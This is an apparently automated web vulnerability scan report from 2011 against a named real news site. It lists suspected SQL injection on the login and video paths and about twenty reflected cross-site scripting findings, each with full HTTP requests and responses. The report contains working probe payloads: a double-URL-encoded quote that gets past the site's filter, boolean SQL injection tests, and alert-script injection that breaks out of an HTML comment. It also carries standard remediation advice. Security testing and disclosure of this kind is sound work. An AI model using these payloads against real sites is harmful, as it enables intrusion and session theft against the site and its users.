wired.com, XSS, CWE-79, CAPEC-86, REST Parameter 1

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://www.wired.com/user/login [name of an arbitrarily supplied request parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/user/login

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user/login?1%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 503 Service Unavailable
Server: Apache/2.0.52 (Red Hat)
Content-Length: 403
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:32:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Temporarily Unavailable</title>
</head><body>
<h1>Service Temporarily Unavailable</h1>
<p>The server is temporarily u
...[SNIP]...

Request 2

GET /user/login?1%2527%2527=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.wired.com/user/login?1%2527%2527=1
Content-Length: 87
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 15:33:10 GMT
Connection: close
Set-Cookie: JSESSIONID=acbgrU5qBQJolc2__261s; path=/

The URL has moved <a href="https://secure.wired.com/user/login?1%2527%2527=1">here</a>

1.2. http://www.wired.com/video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/video/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /video/?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 1

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=300
Expires: Wed, 12 Jan 2011 15:25:26 GMT
Date: Wed, 12 Jan 2011 15:20:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_672363149001_Honda-Corp-Featured-Video-80x60.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/into-the-unknown/672347081001">Into the Unknown</a></li>
<li class="videoDesc">What drives humans to explore? Is the human brain an uncharted frontier unto itself? Join the inquisitive minds at Honda and journey into the unknown with climbers, divers, scientists, astronauts, engineers and other modern-day explorers.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>

var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

...[SNIP]...

Request 2

GET /video/?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response 2

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: private, max-age=292
Expires: Wed, 12 Jan 2011 15:25:37 GMT
Date: Wed, 12 Jan 2011 15:20:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001"><img class='thumb' src="http://brightcove.condenet.com/images/1564549380/1564549380_719323216001_IBM-WATSON-T.jpg?pubId=1564549380" /></a></li>
<li class="videoTitle"><a href="http://www.wired.com/video/latest-videos/featured/1716500189/ibm-and-the-jeopardy-challenge/719095346001">IBM and the Jeopardy! Challenge</a></li>
<li class="videoDesc">An IBM supercomputer named Watson will compete against Jeopardy! champions Ken Jennings and Brad Rutter this February. Watch the trailer.</li>
</ul>
</div>
</div>

</div>
<div class='bc_clear'></div>
</div>

</div>
<div id='bc_pop' class='bc_popUpContainer'>
<div id='bc_desc' class='bc_popUpInner'></div>
<div id='bc_popArrow' class='bc_popArrow'></div>
<div id='bc_popArrow_related' class='bc_popArrow_related'></div>
</div>
<script>

var nextVideoURL = "http://www.wired.com/video/latest-videos/latest/1815816633/ces-2011-rants-media-convergence-at-ces/742144985001";

var bc_gBaseURL = "http://www.wired.com/video/";
var bc_gTitl
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 20 instances of this issue:

/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]
/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]
/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]
/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]
/user/login [REST URL parameter 1]
/user/login [REST URL parameter 2]
/user/logout [REST URL parameter 1]
/user/logout [REST URL parameter 2]
/user/registration [REST URL parameter 1]
/user/registration [REST URL parameter 2]
/video/ [REST URL parameter 1]
/video/search/ [REST URL parameter 1]
/video/search/ [REST URL parameter 2]
/video/search/ [REST URL parameter 2]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205d9"><a>249a37450e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax205d9"><a>249a37450e2/widgets/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:06 GMT
Date: Wed, 12 Jan 2011 12:59:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax205d9"><a>249a37450e2 ss_widgets c_related">
...[SNIP]...

2.2. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26766"><a>ac7204c3476 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets26766"><a>ac7204c3476/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:11 GMT
Date: Wed, 12 Jan 2011 12:59:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets26766"><a>ac7204c3476 c_related">
...[SNIP]...

2.3. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892c1"><a>b717fa44b47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related892c1"><a>b717fa44b47/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Wed, 12 Jan 2011 13:03:00 GMT
Date: Wed, 12 Jan 2011 12:59:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related892c1"><a>b717fa44b47">
...[SNIP]...

2.4. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1ea2a--><script>alert(1)</script>e16b1ceae38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:11:43 GMT
Date: Wed, 12 Jan 2011 05:07:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.5. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc9"><a>2661fde8d90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services84fc9"><a>2661fde8d90/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:09:56 GMT
Date: Wed, 12 Jan 2011 05:05:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services84fc9"><a>2661fde8d90 ss_dart c_init">
...[SNIP]...

2.6. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload afcbe--><script>alert(1)</script>6fa95a9452b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:09:39 GMT
Connection: close
Set-Cookie: JSESSIONID=cabZwTKl-2_Lv4oyrO41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

2.7. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94545"><a>aa0843de90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart94545"><a>aa0843de90d/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:07:52 GMT
Connection: close
Set-Cookie: JSESSIONID=cabTzf5URbO2QfkB3N41s; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart94545"><a>aa0843de90d c_init">
...[SNIP]...

2.8. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e526"><a>ca37ef5da9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart/init3e526"><a>ca37ef5da9c/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:19:47 GMT
Date: Wed, 12 Jan 2011 05:09:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart c_init3e526"><a>ca37ef5da9c">
...[SNIP]...

2.9. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wired.com
Path:	/services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70510--><script>alert(1)</script>b4ecd010e4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28689
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:21:23 GMT
Date: Wed, 12 Jan 2011 05:11:23 GMT
Connection: close

